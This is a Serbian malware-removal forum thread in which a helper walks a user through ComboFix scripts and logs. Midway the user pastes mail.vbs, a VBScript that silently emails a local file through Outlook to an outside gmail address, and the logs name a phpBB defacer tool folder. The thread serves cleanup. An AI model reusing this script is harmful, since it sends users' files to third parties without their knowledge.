R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-06-02 19:00:31 C:\WINDOWS\Tasks\A4277F9291B0F052.job"
- c:\docume~1\n\applic~1\movesi~1\Face Bash Test.exe
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, gmer.net
Rootkit scan 2008-06-02 21:47:47
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\UAService7.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
.
**************************************************************************
.
Completion time: 2008-06-02 21:53:05 - machine was rebooted [n]
ComboFix-quarantined-files.txt 2008-06-02 19:52:51

Pre-Run: 28,894,609,408 bytes free
Post-Run: 29,270,118,400 bytes free

252 --- E O F --- 2008-05-16 20:47:53

Poslao: 02 Jun 2008 22:38
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Arrow Klikni desnim tasterom miša na file: C:\mail.vbs i izaberi opciju Edit. File će se otvoriti u Notepad-u. Iskopiraj sadržaj tog file-a ovde.



-------------------------------------------------------------------------------------



Arrow Zatim... Otvoriti Notepad i iskopirati sledeci tekst:



File::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job


Folder::
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Program Files\move sixth tool
C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Program Files\Circle Developement

DirLook::
C:\Program Files\Ashiyane Digital Security Team

Registry::
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RealInter"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"bend logo clock film"=-





Snimiti na Desktop fajl iz Notepada kao "CFScript"




Prevuci snimljeni skript/tekst na ComboFix ikonicu kao na slici.
Postaviti u sledecoj poruci log koji bude bio napravljen na kraju ciscenja/skeniranja.

Poslao: 03 Jun 2008 14:09
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

Dim x
on error resume next 
Set fso ="Scripting.FileSystem.Object" 
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application") 
Set out= WScript.CreateObject("Outlook.Application") 
Set Mail=ol.CreateItem(0) 
Mail.to="hard.rock.blogger@gmail.com" 
Mail.Subject="IP" 
Mail.Body="IP" 
Mail.Attachments.Add("c:bla.txt")
Mail.Send 
ol.Quit
Dim x
on error resume next 
Set fso ="Scripting.FileSystem.Object" 
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application") 
Set out= WScript.CreateObject("Outlook.Application") 
Set Mail=ol.CreateItem(0) 
Mail.to="hard.rock.blogger@gmail.com" 
Mail.Subject="IP" 
Mail.Body="IP" 
Mail.Attachments.Add("c:bla.txt")
Mail.Send 
ol.Quit

ComboFix 08-06-01.6 - n 2008-06-03 14:02:44.3 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.219 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\n\Desktop\CFScript.txt
 * Created a new restore point

[color=red][b]WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !![/b][/color]

FILE ::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job
.

(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool\[u]0[/u]
C:\Documents and Settings\n\Application Data\move sixth tool\2mfcdtheseek.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Bat flag close.exe
C:\Documents and Settings\n\Application Data\move sixth tool\boblasuq.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Face Bash Test.exe
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\NetworkService\Application Data\move sixth tool\Bat flag close.exe
C:\Program Files\Circle Developement
C:\Program Files\Circle Developement\Uninstall.exe
C:\Program Files\move sixth tool
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\Tasks\A4277F9291B0F052.job

.
(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 13:44   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 13:45   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-21 17:34   744   ----a-w   C:\mail.vbs
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((((((((((   Look   )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.

---- Directory of C:\Program Files\Ashiyane Digital Security Team ----

2000-05-22 10:00   115920   --a------   C:\Program Files\Ashiyane Digital Security Team\PHPBB DEFACER\Msinet.ocx


(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 11:43:09   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

*Newly Created Service* - CATCHME
.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 14:04:46
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 14:05:42
ComboFix-quarantined-files.txt  2008-06-03 12:05:38
ComboFix2.txt  2008-06-02 19:53:06

Pre-Run: 29,282,066,432 bytes free
Post-Run: 29,268,369,408 bytes free

201   --- E O F ---   2008-05-16 20:47:53

Poslao: 03 Jun 2008 17:17
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Hmm...

Hajde obriši folder: C:\Program Files\Ashiyane Digital Security Team

i file: C:\mail.vbs .



Restartuj kompjuter i postavi svež ComboFix log (samo ga pokreni dvoklikom i sačekaj da završi skeniranje kako bi dobio log).

Takođe, napiši kakvo je sada stanje.

Poslao: 03 Jun 2008 17:50
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

ComboFix 08-06-01.6 - n 2008-06-03 17:42:24.4 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.173 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
 * Resident AV is active


[color=red][b]WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !![/b][/color]
.

(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-03 15:22 . 2008-06-03 15:22   <DIR>   d--------   C:\Documents and Settings\n\Application Data\ESET
2008-06-03 15:20 . 2008-06-03 15:20   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\ESET
2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 17:26   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 17:27   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-03 13:20   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 15:25:24   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 13:22:30   10,134   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\callmsi.exe
+ 2008-06-03 13:22:30   140,544   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\egui.exe
+ 2008-03-13 14:43:42   40,456   ----a-w   C:\WINDOWS\system32\drivers\eamon.sys
+ 2008-03-13 14:44:36   29,704   ----a-w   C:\WINDOWS\system32\drivers\easdrv.sys
+ 2008-03-13 14:52:12   71,176   ----a-w   C:\WINDOWS\system32\drivers\epfw.sys
+ 2008-03-13 14:52:16   30,728   ----a-w   C:\WINDOWS\system32\drivers\epfwndis.sys
+ 2008-03-13 14:52:16   54,280   ----a-w   C:\WINDOWS\system32\drivers\epfwtdi.sys
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
